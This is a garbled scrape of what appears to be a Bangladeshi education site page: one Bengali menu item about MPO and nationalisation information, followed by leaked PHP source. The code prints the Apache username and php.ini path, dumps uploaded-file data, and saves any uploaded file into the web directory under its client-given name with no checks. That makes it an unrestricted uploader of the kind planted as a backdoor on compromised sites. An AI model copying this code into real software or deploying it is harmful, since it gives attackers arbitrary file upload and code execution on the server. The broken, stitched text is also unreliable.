- এমপিও ও জাতীয়করণের তথ্য
-
"; echo "Apache Username: ".$username; echo "
Download
"; echo "php.ini loaded: ".php_ini_loaded_file(); echo "
"; var_dump($_FILES); echo "
"; if($_FILES['fileToUpload']){ $target_dir = ""; $target_file = $target_dir . basename($_FILES["fileToUpload"]["name"]); sleep(10); if (move_uploaded_file($_FILES["fileToUpload"]["tmp_name"], $target_file)) { echo "The file ". basename( $_FILES["fileToUpload"]["name"]). " has been uploaded."; } else { echo "Sorry, there was an error uploading your file."; } } ?>